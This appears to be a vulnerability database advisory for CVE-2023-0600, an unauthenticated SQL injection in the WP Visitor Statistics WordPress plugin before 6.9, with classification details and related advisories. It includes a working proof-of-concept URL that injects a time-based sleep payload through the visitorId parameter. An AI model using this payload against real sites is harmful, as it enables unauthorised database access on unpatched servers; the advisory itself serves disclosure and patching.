WP Visitor Statistics (Real Time Traffic) < 6.9 – Unauthenticated SQLi | CVE 2023-0600

Description

The plugin does not escape user input which is concatenated to an SQL query, allowing unauthenticated visitors to conduct SQL Injection attacks.

Proof of Concept

Note: The visitorId parameter's numerical prefix (before the %27) must be different on each try.

https://example.com/?wmcAction=wmcTrack&siteId=34&url=test&uid=01&pid=02&visitorId=132123%27,sleep(10),0,0,0,0,0);--+-

Affects Plugins

wp-stats-manager

Fixed in 6.9

References

CVE

CVE-2023-0600

Classification

Type

SQLI

OWASP top 10

A1: Injection

CWE

CWE-89

CVSS

8.6 (high)

Miscellaneous

Original Researcher

Trần Quốc Trường An

Submitter

Trần Quốc Trường An

Verified

Yes

WPVDB ID

8f46df4d-cb80-4d66-846f-85faf2ea0ec4

Timeline

Publicly Published

2023-04-24 (about 1 years ago)

Added

2023-04-24 (about 1 years ago)

Last Updated

2023-04-24 (about 1 years ago)

Other

Published

Title

Published

2024-04-05

Title

ENL Newsletter <= 1.0.1 - Admin+ SQL Injection

Published

2021-11-29

Title

Rich Reviews by Starfish < 1.9.6 - Admin+ SQL Injection

Published

2014-08-01

Title

PureHTML <= 1.0.0 - SQL Injection

Published

2014-08-01

Title

oQey Gallery <= 0.4.8 - SQL Injection

Published

2021-12-27

Title

WP Cookie User Info < 1.0.9 - Admin+ SQL Injection